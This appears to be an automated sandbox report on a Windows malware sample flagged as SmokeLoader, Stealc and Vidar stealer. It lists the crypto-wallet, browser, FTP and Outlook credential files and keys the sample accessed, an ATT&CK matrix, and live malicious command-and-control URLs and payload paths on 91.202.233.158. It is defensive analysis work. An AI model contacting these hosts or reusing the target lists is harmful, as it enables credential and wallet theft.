Stealing of Sensitive Information

Yara detected CryptOne packer

Source: Yara match

File source: 0000001A.00000002.2426601330.0000000003019000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 00000003.00000002.1937857892.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1937904210.00000000007B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712546480.0000000002361000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712222757.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0000001D.00000002.2618548795.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 708, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: svchost015.exe PID: 708, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000046A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Jaxx Desktop (old)
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Exodus\
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000046A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000046A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: file__0.localstorage
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: svchost015.exe, 0000001D.00000002.2614164343.00000000005AD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000046A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: MultiDoge
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.j?

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Source: SwiftServe.scr	Binary or memory string: WIN_81
Source: SwiftServe.scr	Binary or memory string: WIN_XP
Source: SwiftServe.scr	Binary or memory string: WIN_XPe
Source: SwiftServe.scr	Binary or memory string: WIN_VISTA
Source: SwiftServe.scr	Binary or memory string: WIN_7
Source: SwiftServe.scr	Binary or memory string: WIN_8
Source: Burn.pif.8.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3896, type: MEMORYSTR

Remote Access Functionality

Yara detected CryptOne packer

Source: Yara match

File source: 0000001A.00000002.2426601330.0000000003019000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 00000003.00000002.1937857892.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1937904210.00000000007B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712546480.0000000002361000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712222757.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0000001D.00000002.2618548795.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 708, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: svchost015.exe PID: 708, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E9696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	25_2_00E9696E
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E96E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	25_2_00E96E32
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA20C40 sqlite3_bind_zeroblob,	29_2_6CA20C40
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA20D60 sqlite3_bind_parameter_name,	29_2_6CA20D60
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C948EA0 sqlite3_clear_bindings,	29_2_6C948EA0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA20B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	29_2_6CA20B40
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C946410 bind,WSAGetLastError,	29_2_6C946410
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9460B0 listen,WSAGetLastError,	29_2_6C9460B0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C94C030 sqlite3_bind_parameter_count,	29_2_6C94C030
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C94C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	29_2_6C94C050
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C946070 PR_Listen,	29_2_6C946070
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8D22D0 sqlite3_bind_blob,	29_2_6C8D22D0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9463C0 PR_Bind,	29_2_6C9463C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	321 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	3 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Exploitation for Client Execution	1 Scheduled Task/Job	21 Access Token Manipulation	12 Software Packing	NTDS	339 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Command and Scripting Interpreter	2 Registry Run Keys / Startup Folder	812 Process Injection	1 DLL Side-Loading	LSA Secrets	971 Security Software Discovery	SSH	3 Clipboard Data	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	1 Scheduled Task/Job	RC Scripts	1 Scheduled Task/Job	1 File Deletion	Cached Domain Credentials	461 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	111 Masquerading	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	461 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	812 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
h8jGj6Qe78.exe	42%	ReversingLabs	Win32.Trojan.Generic
h8jGj6Qe78.exe	41%	Virustotal		Browse
h8jGj6Qe78.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\ewggbbh	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\329C.exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\329C.exe	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\795933\Burn.pif	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFA6.exe	24%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\svchost015.exe	4%	ReversingLabs
C:\Users\user\AppData\Roaming\ewggbbh	42%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
epohe.ru	1%	Virustotal		Browse
free.cdn.hstgr.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://aka.ms/odirmr	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	URL Reputation	safe
https://wns.windows.com/L	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://stackoverflow.com/q/14436606/23354	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
http://schemas.micr	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	0%	URL Reputation	safe
http://91.202.233.158/e96ea2db21fa9a1b.phpK	100%	Avira URL Cloud	malware
https://www.rd.com/list/polite-habits-campers-dislike/	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
http://91.202.233.158/3836fd5700214436/nss3.dllA5	100%	Avira URL Cloud	malware
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q	0%	Avira URL Cloud	safe
https://outlook.com_	0%	URL Reputation	safe
http://91.202.233.158/3836fd5700214436/msvcp140.dll	100%	Avira URL Cloud	malware
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
http://91.202.233.158/3836fd5700214436/nss3.dll%	100%	Avira URL Cloud	malware
http://schemas.mi	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
http://ocsps.ssl.com0	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
http://91.202.233.158/e96ea2db21fa9a1b.php.dll	100%	Avira URL Cloud	malware
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll	0%	Avira URL Cloud	safe
http://www.x-ways.net/winhex/subscribe-d.htmlU	0%	Avira URL Cloud	safe
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q	0%	Virustotal		Browse
http://91.202.233.158/3836fd5700214436/sqlite3.dll	100%	Avira URL Cloud	malware
http://www.x-ways.net/winhex/subscribe-d.htmlU	1%	Virustotal		Browse
https://www.autoitscript.com/autoit3/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	0%	Avira URL Cloud	safe
http://91.202.233.158/3836fd5700214436/msvcp140.dll	5%	Virustotal		Browse
http://91.202.233.158/	100%	Avira URL Cloud	malware
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll	0%	Virustotal		Browse
http://91.202.233.158/e96ea2db21fa9a1b.php3	100%	Avira URL Cloud	malware
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
http://91.202.233.158/3836fd5700214436/sqlite3.dll	5%	Virustotal		Browse
http://91.202.233.158/e96ea2db21fa9a1b.php	100%	Avira URL Cloud	malware
http://91.202.233.158/e96ea2db21fa9a1b.phpK	11%	Virustotal		Browse
https://www.autoitscript.com/autoit3/	0%	Virustotal		Browse
http://www.x-ways.net/order.html-d.htmlS	0%	Avira URL Cloud	safe
http://91.202.233.158/3836fd5700214436/msvcp140.dllj	100%	Avira URL Cloud	malware
http://91.202.233.158/e96ea2db21fa9a1b.phpK0	100%	Avira URL Cloud	malware
http://91.202.233.158/e96ea2db21fa9a1b.php7	100%	Avira URL Cloud	malware
http://91.202.233.158/	12%	Virustotal		Browse
http://91.202.233.158/e96ea2db21fa9a1b.php	5%	Virustotal		Browse
http://91.202.233.158/3836fd5700214436/nss3.dll:	100%	Avira URL Cloud	malware
http://91.202.233.158/e96ea2db21fa9a1b.php-fulluser-l1-1-0	100%	Avira URL Cloud	malware
http://91.202.233.158/e96ea2db21fa9a1b.php?	100%	Avira URL Cloud	malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	Avira URL Cloud	safe
https://cdn.epnacl	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection	0%	Avira URL Cloud	safe
http://91.202.233.158/7	100%	Avira URL Cloud	malware
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	0%	Avira URL Cloud	safe
http://www.x-ways.net/order.html-d.htmlS	1%	Virustotal		Browse
http://www.mozilla.com/en-US/blocklist/	0%	Virustotal		Browse
http://91.202.233.158/3836fd5700214436/vcruntime140.dll	100%	Avira URL Cloud	malware
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	0%	Avira URL Cloud	safe
http://91.202.233.158/3836fd5700214436/vcruntime140.dll	5%	Virustotal		Browse
https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection	1%	Virustotal		Browse
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
http://91.202.233.158/E	100%	Avira URL Cloud	malware
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	0%	Avira URL Cloud	safe
https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe	0%	Avira URL Cloud	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	0%	Avira URL Cloud	safe
https://cdn.ep	0%	Avira URL Cloud	safe
http://91.202.233.158/e96ea2db21fa9a1b.phpg	100%	Avira URL Cloud	malware
https://stackoverflow.com/q/2152978/23354rCannot	0%	Avira URL Cloud	safe
http://91.202.233.158/e96ea2db21fa9a1b.phpo	100%	Avira URL Cloud	malware
